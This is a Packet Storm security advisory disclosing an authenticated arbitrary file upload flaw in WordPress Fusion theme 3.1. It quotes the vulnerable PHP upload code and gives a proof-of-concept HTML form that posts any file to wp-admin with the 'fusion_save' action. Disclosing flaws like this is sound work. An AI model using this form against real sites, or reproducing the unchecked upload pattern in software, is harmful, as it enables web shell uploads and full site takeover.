WordPress Fusion 3.1 Arbitrary File Upload

2015-02-13T00:00:00
ID PACKETSTORM:130397
Type packetstorm
Reporter Evex
Modified 2015-02-13T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------------  
WordPress Fusion Theme Authenicated Arbitrary File Upload  
------------------------------------------------------------------------------  
  
  
[-] Theme Link:  
  
https://wordpress.org/themes/fusion ( Over 334,000 Downloads )  
http://digitalnature.ro/themes/fusion/  
  
[-] Affected Version:  
  
Version 3.1   
  
  
[-] Vulnerability Description:  
  
The vulnerable code is located in the /functions script:  
//SHORTENED CODE  
  
function fusion_options() {  
  
if ( 'fusion_save' == $_REQUEST['action'] ) {  
if ($_FILES["file-logo"]["type"]){  
$directory = $uploadpath['basedir'].'/';  
move_uploaded_file($_FILES["file-logo"]["tmp_name"],  
$directory . $_FILES["file-logo"]["name"]);  
update_option('fusion_logoimage', $uploadpath['baseurl']. "/".  
$_FILES["file-logo"]["name"]);  
}  
  
}  
add_action('admin_menu', 'fusion_options');  
  
  
then function fusion_options can be called by LOGGED IN USERS and executed  
which leads to uploading any file on attacked server which may cause the  
site full take over.  
  
  
[-] Proof of Concept:  
  
<form action="http://localhost/x/wordpress/wp-admin/admin.php"  
method="post" enctype="multipart/form-data">  
<input type="file" name="file-logo" />  
<input type="hidden" name="action" value="fusion_save" />  
<button type="submit" >Upload</button>  
</form>  
`